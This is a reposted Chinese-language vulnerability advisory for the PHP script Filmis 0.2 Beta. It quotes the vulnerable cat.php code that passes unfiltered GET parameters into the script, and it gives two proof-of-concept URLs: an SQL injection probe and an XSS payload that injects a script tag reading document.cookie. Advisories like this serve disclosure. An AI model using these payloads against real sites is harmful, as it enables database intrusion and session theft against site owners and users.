来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities作者: M.Jock3R www.2cto.com下载地址: http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip测试平台: windows XP......
|
标题: Filmis - Version 0.2 Beta SQL Injection and XSS Vulnerabilities 作者: M.Jock3R www.2cto.com 下载地址: http://mohshow.fr.cr/forum/downloads/filmis-0.2beta.zip 测试平台: windows XP Sp2 FR 缺陷文件: cat.php 缺陷代码: $idcat = $_GET['id']; $nbitemparpage= "28"; if(@$_GET['nb']=="") { $nb = "1"; } else { $nb = $_GET['nb']; } $nbd = ceil(($nb -1) * $nbitemparpage); $amem = mysql_query("SELECT * FROM ".$prefix."film");
测试: 1/SQL注射:
http://www.2cto.com /filmis/cat.php?nb=-1' 2/XSS : http://www.2cto.com /filmis/cat.php?nb=1><script>alert(document.cookie)</script>
致谢 adelsbm / attiadona / Wprojects.tk
修复:过滤 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
